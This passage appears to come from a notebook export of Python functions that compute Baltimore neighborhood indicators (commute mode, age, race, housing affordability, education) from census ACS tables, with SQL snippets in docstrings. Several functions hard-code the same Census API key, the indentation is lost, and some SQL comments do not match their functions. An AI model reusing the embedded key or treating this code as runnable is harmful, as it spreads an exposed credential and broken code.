# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( value[3] / nullif((value[1]-value[2]),0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.iloc[: ,0] - denominators.iloc[: ,1]
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
#~~~~~~~~~~~~~~~
# Step 4)
# Add Special Baltimore City Data
# 100- "6.7", "59.8", "9.2", "18.4", "3.7", = 2.2
# 100- (walked + drvalone + carpool + pubtran + workfromhome(13e))
#~~~~~~~~~~~~~~~
url = 'https://api.census.gov/data/20'+str(year)+'/acs/acs5/subject?get=NAME,S0801_C01_010E,S0801_C01_003E,S0801_C01_004E,S0801_C01_009E,S0801_C01_013E&for=county%3A510&in=state%3A24&key=829bf6f2e037372acbba32ba5731647c5127fdb0'
table = pd.read_json(url, orient='records')
walked = float(table.loc[1, table.columns[1]] )
drvalone = float(table.loc[1, table.columns[2]] )
carpool = float(table.loc[1, table.columns[3]] )
pubtran = float(table.loc[1, table.columns[4]] )
workfromhome = float(table.loc[1, table.columns[5]] )
fi['final']['Baltimore City'] = 100 - ( walked + drvalone + carpool + pubtran + workfromhome )
return fi['final']
"""
/* <othrcom_14> */ --
WITH tbl AS (
select csa,
( value[3] / nullif((value[1]-value[2]),0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B08101_001E','B08101_049E','B08101_041E'])
)
update vital_signs.data
set othrcom = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: p2more.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B03002 - HISPANIC OR LATINO ORIGIN BY RACE
# Universe: Total Population
# Table Creates: racdiv, paa, pwhite, pasi, phisp, p2more, ppac
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def p2more( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B03002*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# Append the one column from the other ACS Table
df['B03002_012E_Total_Hispanic_or_Latino']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
tot = df[ 'B03002_001E_Total' ]
df1['TwoOrMore%NH'] = df['B03002_009E_Total_Not_Hispanic_or_Latino_Two_or_more_races'] / tot * 100
return df1['TwoOrMore%NH']
# Cell
#File: pubtran.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08101 - MEANS OF TRANSPORTATION TO WORK BY AGE
# Universe: Workers 16 Years and Over
# Table Creates: othrcom, drvalone, carpool, pubtran, walked
#purpose: Produce Sustainability - Percent of Population that Uses Public Transportation to Get to Work Indicator
#input: Year
#output:
import pandas as pd
import glob
def pubtran( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B08101*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B08101_001E','B08101_049E','B08101_025E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B08101_025E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B08101_001E','B08101_049E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( value[3] / nullif((value[1]-value[2]),0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.iloc[: ,0] - denominators.iloc[: ,1]
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
#~~~~~~~~~~~~~~~
# Step 4)
# Add Special Baltimore City Data
#~~~~~~~~~~~~~~~
url = 'https://api.census.gov/data/20'+str(year)+'/acs/acs5/subject?get=NAME,S0801_C01_009E&for=county%3A510&in=state%3A24&key=829bf6f2e037372acbba32ba5731647c5127fdb0'
table = pd.read_json(url, orient='records')
fi['final']['Baltimore City'] = float(table.loc[1, table.columns[1]])
return fi['final']
""" /* <pubtran_14> */ --
WITH tbl AS (
select csa,
( value[3] / nullif((value[1]-value[2]),0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B08101_001E','B08101_049E','B08101_025E'])
)
update vital_signs.data
set pubtran = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: age5.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B01001 - SEX BY AGE
# Universe: Total population
# Table Creates: tpop, female, male, age5 age18 age24 age64 age65
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def age5( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B01001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# df.columns
total = df['B01001_001E_Total']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
# Under 5
df1['under_5'] = ( df[ 'B01001_003E_Total_Male_Under_5_years' ]
+ df[ 'B01001_027E_Total_Female_Under_5_years' ]
) / total * 100
return df1['under_5']
# Cell
#File: age24.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B01001 - SEX BY AGE
# Universe: Total population
# Table Creates: tpop, female, male, age5 age18 age24 age64 age65
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def age24( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B01001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# df.columns
total = df['B01001_001E_Total']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
df1['eighteen_to_24'] = ( df[ 'B01001_007E_Total_Male_18_and_19_years' ]
+ df[ 'B01001_008E_Total_Male_20_years' ]
+ df[ 'B01001_009E_Total_Male_21_years' ]
+ df[ 'B01001_010E_Total_Male_22_to_24_years' ]
+ df[ 'B01001_031E_Total_Female_18_and_19_years' ]
+ df[ 'B01001_032E_Total_Female_20_years' ]
+ df[ 'B01001_033E_Total_Female_21_years' ]
+ df[ 'B01001_034E_Total_Female_22_to_24_years' ]
) / total * 100
return df1['eighteen_to_24']
# Cell
#File: age64.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B01001 - SEX BY AGE
# Universe: Total population
# Table Creates: tpop, female, male, age5 age18 age24 age64 age65
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def age64( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B01001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# df.columns
total = df['B01001_001E_Total']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
df1['twentyfive_to_64'] = ( df[ 'B01001_011E_Total_Male_25_to_29_years' ]
+ df[ 'B01001_012E_Total_Male_30_to_34_years' ]
+ df[ 'B01001_013E_Total_Male_35_to_39_years' ]
+ df[ 'B01001_014E_Total_Male_40_to_44_years' ]
+ df[ 'B01001_015E_Total_Male_45_to_49_years' ]
+ df[ 'B01001_016E_Total_Male_50_to_54_years' ]
+ df[ 'B01001_017E_Total_Male_55_to_59_years' ]
+ df[ 'B01001_018E_Total_Male_60_and_61_years' ]
+ df[ 'B01001_019E_Total_Male_62_to_64_years' ]
+ df[ 'B01001_035E_Total_Female_25_to_29_years' ]
+ df[ 'B01001_036E_Total_Female_30_to_34_years' ]
+ df[ 'B01001_037E_Total_Female_35_to_39_years' ]
+ df[ 'B01001_038E_Total_Female_40_to_44_years' ]
+ df[ 'B01001_039E_Total_Female_45_to_49_years' ]
+ df[ 'B01001_040E_Total_Female_50_to_54_years' ]
+ df[ 'B01001_041E_Total_Female_55_to_59_years' ]
+ df[ 'B01001_042E_Total_Female_60_and_61_years' ]
+ df[ 'B01001_043E_Total_Female_62_to_64_years' ]
) / total * 100
return df1['twentyfive_to_64']
# Cell
#File: age18.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B01001 - SEX BY AGE
# Universe: Total population
# Table Creates: tpop, female, male, age5 age18 age24 age64 age65
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def age18( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B01001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# df.columns
total = df['B01001_001E_Total']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
df1['five_to_17'] = ( df[ 'B01001_004E_Total_Male_5_to_9_years' ]
+ df[ 'B01001_005E_Total_Male_10_to_14_years' ]
+ df[ 'B01001_006E_Total_Male_15_to_17_years' ]
+ df[ 'B01001_028E_Total_Female_5_to_9_years' ]
+ df[ 'B01001_029E_Total_Female_10_to_14_years' ]
+ df[ 'B01001_030E_Total_Female_15_to_17_years' ]
) / total * 100
return df1['five_to_17']
# Cell
#File: age65.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B01001 - SEX BY AGE
# Universe: Total population
# Table Creates: tpop, female, male, age5 age18 age24 age64 age65
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def age65( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B01001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# df.columns
total = df['B01001_001E_Total']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
df1['sixtyfive_and_up'] = ( df[ 'B01001_020E_Total_Male_65_and_66_years' ]
+ df[ 'B01001_021E_Total_Male_67_to_69_years' ]
+ df[ 'B01001_022E_Total_Male_70_to_74_years' ]
+ df[ 'B01001_023E_Total_Male_75_to_79_years' ]
+ df[ 'B01001_024E_Total_Male_80_to_84_years' ]
+ df[ 'B01001_025E_Total_Male_85_years_and_over' ]
+ df[ 'B01001_044E_Total_Female_65_and_66_years' ]
+ df[ 'B01001_045E_Total_Female_67_to_69_years' ]
+ df[ 'B01001_046E_Total_Female_70_to_74_years' ]
+ df[ 'B01001_047E_Total_Female_75_to_79_years' ]
+ df[ 'B01001_048E_Total_Female_80_to_84_years' ]
+ df[ 'B01001_049E_Total_Female_85_years_and_over' ]
) / total * 100
return df1['sixtyfive_and_up']
# Cell
#File: affordm.py
#Author: Charles Karpati
#Date: 1/25/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B25091 - MORTGAGE STATUS BY SELECTED MONTHLY OWNER COSTS AS A PERCENTAGE OF HOUSEHOLD INCOME IN THE PAST 12 MONTHS
# Universe: Owner-occupied housing units
# Table Creates:
#purpose: Produce Housing and Community Development - Affordability Index - Mortgage Indicator
#input: Year
#output:
import pandas as pd
import glob
def affordm( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B25091*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B25091_008E','B25091_009E','B25091_010E','B25091_011E','B25091_002E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B25091_008E','B25091_009E','B25091_010E','B25091_011E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B25091_002E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( (value[1]+value[2]+value[3]+value[4]) / nullif(value[5],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
WITH tbl AS (
select csa,
( (value[1]+value[2]+value[3]+value[4]) / nullif(value[5],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B25091_008E','B25091_009E','B25091_010E','B25091_011E','B25091_002E'])
)
update vital_signs.data
set affordm = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: affordr.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B25070 - GROSS RENT AS A PERCENTAGE OF HOUSEHOLD INCOME IN THE PAST 12 MONTHS
# Universe: Renter-occupied housing units
#purpose: Produce Housing and Community Development - Affordability Index - Rent Indicator
#input: Year
#output:
import pandas as pd
import glob
def affordr( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B25070*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B25070_007E','B25070_008E','B25070_009E','B25070_010E','B25070_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B25070_007E','B25070_008E','B25070_009E','B25070_010E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B25070_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( (value[1]+value[2]+value[3]+value[4]) / nullif(value[5],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
WITH tbl AS (
select csa,
( (value[1]+value[2]+value[3]+value[4]) / nullif(value[5],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B25070_007E','B25070_008E','B25070_009E','B25070_010E','B25070_001E'])
)
update vital_signs.data
set affordr = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: bahigher.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B06009 - PLACE OF BIRTH BY EDUCATIONAL ATTAINMENT IN THE UNITED STATES
#purpose: Produce Workforce and Economic Development - Percent Population (25 Years and over) with a Bachelor's Degree or Above
#Table Uses: B06009 - lesshs, hsdipl, bahigher
#input: Year
#output:
import pandas as pd
import glob
def bahigher( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B06009*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B06009_005E','B06009_006E','B06009_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B06009_005E','B06009_006E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B06009_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation + final mods
# ( ( value[1] + value[2] ) / nullif(value[3],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <hsdipl_14> */ --
WITH tbl AS (
select csa,
( ( value[1] + value[2] ) / nullif(value[3],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B06009_003E','B06009_004E','B06009_001E'])
)
update vital_signs.data
set hsdipl = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
B06009_004E
label "Estimate!!Total!!Some college or associate's degree"
B06009_003E
label "Estimate!!Total!!High school graduate (includes equivalency)"
B06009_002E
label "Estimate!!Total!!Less than high school graduate"
B06009_001E
label "Estimate!!Total"
B06009_005E
label "Estimate!!Total!!Bachelor's degree"
B06009_006E
label "Estimate!!Total!!Graduate or professional degree"
"""
# Cell
#File: carpool.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08101 - MEANS OF TRANSPORTATION TO WORK BY AGE
# Universe: Workers 16 Years and Over
# Table Creates: othrcom, drvalone, carpool, pubtran, walked
#purpose: Produce Sustainability - Percent of Population that Carpool to Work Indicator
#input: Year
#output:
import pandas as pd
import glob
def carpool( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B08101*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B08101_001E','B08101_049E','B08101_017E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B08101_017E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B08101_001E','B08101_049E']
for col in columns:
denominators = addKey(df, denominators, col)
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation + final mods
# ( value[3] / (value[1]-value[2]) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.iloc[: ,0] - denominators.iloc[: ,1]
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
#~~~~~~~~~~~~~~~
# Step 4)
# Add Special Baltimore City Data
#~~~~~~~~~~~~~~~
url = 'https://api.census.gov/data/20'+str(year)+'/acs/acs5/subject?get=NAME,S0801_C01_004E&for=county%3A510&in=state%3A24&key=829bf6f2e037372acbba32ba5731647c5127fdb0'
table = pd.read_json(url, orient='records')
fi['final']['Baltimore City'] = float(table.loc[1, table.columns[1]])
return fi['final']
"""
WITH tbl AS (
select csa,
( value[3] / nullif( (value[1]-value[2]) ,0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2013',ARRAY['B08101_001E','B08101_049E','B08101_017E'])
)
update vital_signs.data
set carpool = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2013';
"""
# Cell
#File: drvalone.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08101 - MEANS OF TRANSPORTATION TO WORK BY AGE
# Universe: Workers 16 Years and Over
# Table Creates: othrcom, drvalone, carpool, pubtran, walked
#purpose: Produce Sustainability - Percent of Population that Drove Alone to Work Indicator
#input: Year
#output:
import pandas as pd
import glob
def drvalone( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B08101*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B08101_001E','B08101_049E','B08101_009E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B08101_009E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B08101_001E','B08101_049E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
